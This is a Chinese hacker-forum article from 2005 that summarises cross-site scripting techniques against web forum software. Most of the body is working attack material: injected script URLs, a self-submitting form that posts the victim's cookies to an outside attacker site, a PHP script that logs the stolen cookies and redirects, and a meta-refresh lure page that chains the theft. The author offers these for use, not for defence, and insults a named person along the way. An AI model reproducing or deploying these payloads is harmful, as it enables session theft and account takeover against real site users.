| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 |

您现在的位置： 中国X黑客小组 >> 技术文章 >> 黑客技术 >> 入侵检测 >> 文章正文 用户登录 新用户注册

一些跨站脚本攻击的总结    热     ★★★ 【字体：小 大】
一些跨站脚本攻击的总结
作者：冰血封情…    文章来源：EvilOctal Security Team(www.Ev    点击数：    更新时间：2005-1-6
注意:这文章有局限性 但是毕竟是针对我个人的空间的情况而定义的 本来就是我个人的技术总结么 其他人生死冰血封情可就不管了 抱歉哦 以动网为例子通过简单构造弹出cookies的url来检测漏洞是否存在: http://www.target.com/bbs/target.asp?Errcodes=<script>alert(document.cookie)</script>&action=otherErr 以上将弹出本地用户的cookies 下面重定向地址到邪恶八进制 http://www.target.com/bbs/target.asp?Errcodes=<script>document.location='[url]http://www.EvilOctal.com[/url]'</script>&action=otherErr 其实方法在这里 php如果过滤不严 也大同小异 http://www.target.com/bbs/target.php/"><script>alert(document.cookie)</script> 下面是经典用法 构造链接盗取cookies 这里以php空间为例子 谁让偶的是bsd+mysql+php空间呢: 仍以动网为例子 构造如下链接 别以为我说的是动网哦 相信聪明的你很容易明白的^_^ http://www.target.com/bbs/target.asp?Errcodes=<script>document.location='[url]http://www.SecurityPeak.com/cookie.asp?[/url]'%2B.</script>&action=otherErr 很遗憾 有的时候没那么好：（ 第一 有可能受到主机安全限制无法执行以上的url 比如php中那个恶心的斜杠 第二 没有一个白痴会像流氓豆(嘿嘿 对Etern4lCn进行一下人身攻击)一样去点这么奇怪的一个地址链接 好!首先来如何解决一...突破php安全限制: http://www.target.com/bbs/target.php/"><form name=EvilOctal method=post action=http://www.EvilOctal.com/cookie.php> <input type=txt name=info><input type=submit value=EvilOctal></form> <script> document.EvilOctal.info.value=document.cookie; document.EvilOctal.submit(); </script> 以下我们来看看cookie.php的内容 因为cookie在远程提交的时候 必需有负责接收的: <?php $info = getenv("QUERY_STRING"); if ($info) { $info=urldecode($info); $fp = fopen("info.txt","a"); fwirte($fp,$info."\n\n\n\n"); fclose($fp); header("Location:[url]http://www.EvilOctal.com/news.htm[/url]"); } ?> 这样第一个问题就完美解决：） 现在我们来看看第二个 嘿嘿 其实上面一经解决了 只要大家看看美丽的news.htm的内容就知道了: <meta http-equiv="refresh" content="1;url=http://www.target.com/bbs/target.asp?Errcodes=<script>document.location='[url]http://www.EvilOctal.com/cookie.php?[/url]'%2Bdocument.cookie</script>&action=otherErr> 现在明白了么？其实关键就在那个cookie.php 欺骗的关键 这样针对跨站脚本攻击中最敏感的部分冰血封情就总结完了 欢迎来到邪恶八进制 论坛地址自己找... Have fun：）
文章录入：IceRiver    责任编辑：IceRiver
	上一篇文章： 记一次完整入侵过程 下一篇文章： 一次没有完全成功的入侵
【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				百度空间跨站攻击详解 XSS跨站脚本及SQL注入漏洞技 2007十大Web安全漏洞 跨站脚 一些不法厂商与病毒制造者“ 一些杀病毒小伎俩 浅谈WINDOWS操作系统防黑的一 一些很酷的.Net编程技巧（二 Oracle应用服务器动态监听服 了解掌握无线加密的一些选择 常见的一些留后门手法

网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）

关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM

© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved.